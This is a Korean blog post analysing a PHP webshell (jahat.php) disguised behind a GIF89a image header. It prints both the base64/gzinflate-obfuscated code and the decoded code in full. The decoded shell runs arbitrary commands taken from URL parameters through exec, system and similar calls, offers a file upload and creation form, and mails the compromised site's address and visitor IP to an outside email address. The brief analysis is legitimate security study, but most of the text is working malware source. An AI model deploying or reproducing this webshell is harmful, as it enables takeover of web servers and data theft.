티스토리 뷰

PHP WebShell(jahat.php) 파일 분석 

출처 : http://blog.naver.com/koromoon/120179484526


( 1 ) PHP WebShell Encode

GIF89a ? ????A¿A¿A¿!A¹ ????,???? ? ?? D ?;?<?php
@error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc'];
if (isset($lol)) {eval(gzinflate(base64_decode('pZJda8IwFIbvB/sPMQhNQMR9XM05Cvsbg1DTE5vRJiEnnRbxvy9Jre5C8GJ35f143kMoyMYS+rNyn/5l/771H3T9+ABZxAHf6NI1TvSm6oDxJZ0Cc9nVG5pjxm5X9ZDa2QCEXa+TDQeWYnziXa2oqN7IoK0hOaWAH2PXA5INKYroa0XYDDoXhtFOvlZsqgk4aAzICjiALLJbps8cXiRQmj0Dv602jH4ZejFO8aQW4RYQG2hbccWeGeVVHw+6QxkwQHc+zG4FhsoHlkrlaF0gEz+GdhCEtCaAiYicjSKYWsgWKsPuTLoKMTS+vzk6mf+eLTWKWLW9l8DmKiGcdWDGh6ee8r+vRtMvsW90C2xWKrAqVjgnR5L9ZSwrD1Ud1cXT6vmVr8kpHStbi4mep6PiIfTe5FJSfgE='))); die; }
elseif (isset($osc)) {eval(gzinflate(base64_decode('pZHNasMwEITvhb6DYgyWIZS2lF5CwA9SEI48ilUcyWhlmhDy7l3J+ekhkENPEjM73w5SqXfdetMSPj9UB+07yNKTrlfPTyUI28mmAexlyWdSoXsvbhYrZnI6Wu9EnjKoj5wNILEWVcW+NUIusBvjYbaTb428xBT2liLJCnvoKrtNuubhZQLlMjPw21sniy9XXI0TVxoI94DUYxjUDXtmNDd9LvSAcqCI3bmY3yiKbYgyhZrZukIufB7aIirtXYRjRJ5lEa5TekDr5IOVY0sU+zDdXXox/722saQ46qeg+dNNQox+hJsfvghF/ffVioLDP70dIBeNgTccqWtxFNl/4bAJaDtWl2+v7x/1SpxSWT14SvS8mpWAOAWXQ0n5BQ=='))); }
else {eval(gzinflate(base64_decode('pVNdi9swEHw/uP+wEQbFkCZpy0G5xKGhJEdpoAX3nkIwii3XAtsSllwnd+S/V7LsOL409KF+8cfOjGdnV07Ic0VzBR5IVTAhUyITKodO8OO7/3OLmzLeuTNwwpilVCPPRfOOd7pSvqmUTeX+joYJBzzfL+b7YoHHIhFBmZOMDt0xNp/mk/0Cd7iYFxmQUDGeewhBRlXCIw8JLhUCmofqKKiHsjJVTJBCTQz+XUQUQWBUPUQqBCyq75e6ih4UKSixqLZpqY6p5lQsUsnjw6cHcZgllP1K1OOH6VQctMLYabDa7aQVsb104iwXpQJrzWBaL3U+CCR70S/vpwh+k7TUjzmtTMWEga51LDcI9Y+UZltZWe4zpmxrQSnSs9YXC7tlxzqwkpduPk7R4qbv8n98a3OcRP/0/Wxhev5mhLUai89r13Sv1+71/g705SQkj+oVi7mg+dDu4ghwhd2ZhRi6RbUk+xWGcVUwRdvqCNqZuuB5HqyXG3/lwivU3SC9qjbTdt+flk/LjVlTM3U0g1MnTlNJbxP952/+yofBYHDJhjhMuTy7ad2femK4E1tfebDbZ3yc+qHZ6LvQdO1zyMVRI9ZfNyt/i+2x3GKVicDMC+9GzeF1ewnY6bTn+rqRfhRvY+iza+9/J5/+AA=='))); }
eval(gzinflate(base64_decode('jVHZbsIwEHyv1H+wLCSD2oR3Sjkq0oJUjoZQqSrIMsmWGOIYOe7B33dNEIf60ifbO7Mzu+N2izTb11cVKxXwIoUsI/eEUj8RFqo0qav6G/FIvyEbBa35lN4hV265AaUtILXCp0H4GoTvNAyG4yjg3V4vpAtH+zBalZKxTpDL1iLe8LVIhfXiVOQr8ESiZO6ttVaZuPnWZmug6DB/BTbVhV3ucqGgerRg5clH3WHAFjWfMWdjNQclpJubbbSSP3qZdlau4sda7SkFmC8w/MDC7f5pQAnuTv0T3o+iCe+PpxFbHLLIZL6JjVMdSfKgC/KMBTLaCdK46LxQxt4zKAxeZsE04rNw4CC0HEzIG+ZDnj5zIXNUOovcIxF+FZZOP7YfJAWRwH6QR8wd8cv452aeh7DNdp7Vf0An0HHpVI9p3pLz1PBVLoqX0qiGLe1Ws/0L')));
?>



( 2 ) PHP WebShell Decode


GIF89a ? ????A¿A¿A¿!A¹ ????,???? ? ?? D ?;?<?php
@error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc'];

if (isset($lol)) { echo "v0pCr3w<br>";echo "sys:".php_uname()."<br>";$cmd="echo nob0dyCr3w";$eseguicmd=ex($cmd);echo $eseguicmd;function ex($cfe){$res = '';if (!empty($cfe)){if(function_exists('exec')){@exec($cfe,$res);$res = join("\n",$res);}elseif(function_exists('shell_exec')){$res = @shell_exec($cfe);}elseif(function_exists('system')){@ob_start();@system($cfe);$res = @ob_get_contents();@ob_end_clean();}elseif(function_exists('passthru')){@ob_start();@passthru($cfe);$res = @ob_get_contents();@ob_end_clean();}elseif(@is_resource($f = @popen($cfe,"r"))){$res = "";while(!@feof($f)) { $res .= @fread($f,1024); }@pclose($f);}}return $res;} die; }

elseif (isset($osc)) { $cmd=base64_decode($osc);$eseguicmd=ex($cmd);echo $eseguicmd;function ex($cfe){$res = '';if (!empty($cfe)){if(function_exists('exec')){@exec($cfe,$res);$res = join("\n",$res);}elseif(function_exists('shell_exec')){$res = @shell_exec($cfe);}elseif(function_exists('system')){@ob_start();@system($cfe);$res = @ob_get_contents();@ob_end_clean();}elseif(function_exists('passthru')){@ob_start();@passthru($cfe);$res = @ob_get_contents();@ob_end_clean();}elseif(@is_resource($f = @popen($cfe,"r"))){$res = "";while(!@feof($f)) { $res .= @fread($f,1024); }@pclose($f);}}return $res;} }

else { $content = stripslashes($_POST['content']); $cfile = $_POST['cfile']; $ufile = $_POST['ufile'];echo '<b><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="aw" id="aw">';echo '<textarea name=content style="width:585px;height:200px">'.$content.' }
?> <?$time_shell = "".date("d/m/Y - H:i:s")."";$ip_remote = $_SERVER["REMOTE_ADDR"];$from_shellcode ='jack_jahat-change-admin-joomla+worpres@'.gethostbyname($_SERVER['SERVER_NAME']).'';$to_email = 'komixobh@gmail.com';$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])."  - ".$_SERVER['HTTP_HOST']."";$linkcr = "Ni Bos Link Nya : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Yang Gunain : $ip_remote - Time: $time_shell";$header = "From: $from_shellcode\r\nReply-to: $from_shellcode";@mail($to_email, $server_mail, $linkcr, $header);?><?
?>



( 3 ) 코드 해석

if (isset($lol)) 문 코드는 취약점을 식별하고 일부 시스템 정보를 출력함.
elseif (isset($osc)) 문 코드는 URL에서 직접 명령을 받아 실행함.
else 문 코드는 파일 업로드 실행 및 파일 생성함.


댓글
안내
궁금한 점을 댓글로 남겨주시면 답변해 드립니다.